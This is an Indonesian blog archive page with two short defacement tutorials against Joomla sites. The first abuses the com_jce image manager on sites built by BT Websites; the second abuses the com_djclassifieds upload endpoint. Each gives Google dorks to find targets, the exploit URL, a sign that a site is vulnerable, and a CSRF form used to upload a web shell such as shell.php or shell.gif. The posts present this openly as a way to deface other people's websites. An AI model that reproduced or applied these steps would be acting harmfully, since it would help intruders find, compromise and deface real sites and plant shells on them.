Postingan

Menampilkan postingan dari Mei, 2019

Joomla BT Websites vulnerability com_jce with csrf

-
Gambar
Joomla BT Websites vulnerability com_jce with csrf Dork   : intext:"Built By BT Websites" Exploit :  index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Csrf :  pastebin Dorking dlu, anggap ae dah dapet target Buat yg gamau ribet langsung make bot ae Tambah exploit Contoh site,com/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20 Vuln?  {"result":null,"error":"No function call specified!"} Masukin target ke csrf  Upload file gif/jpg/png cek file di site,com/shell.gif Ok gitu doang
Posting Komentar
Baca selengkapnya

Deface metode Joomla com_djclassifieds File Upload Vulnerability 

-
Gambar
Hey gan kali gw akan share deface metode com_djclassifieds, ok langsung simak ae Bahan2 yg dibutuhin - Hp / Pc - Internet (ya iya lah) - CSRF offline  / CSRF online Oh iya CSRF offline filetype na bisa diganti misal : shell.php simpan CSRF offline ext:html/htm - Exploit index.php?option=com_djclassifieds&task=upload&tmpl=component - Dork inurl:/com_djclassifieds inurl:/components/com_djclassifieds/ Kembangin lagi biar dapet web yang vuln Oh ya dork juga bisa dicari digambar Misal seperti ini masukan Exploit nya  index.php?option=com_djclassifieds&task=upload&tmpl=component Contoh site.com/components/ com_djclassifieds site.com/ index.php?option=com_djclassifieds&task=upload&tmpl=component atau site.com/[path]/components/ com_djclassifieds site.clm/[path]/index.php?option=com_djclassifieds&task=upload&tmpl=component Ciri ciri vuln Copy link pastekan / tempel ke csrf tadi
1 komentar
Baca selengkapnya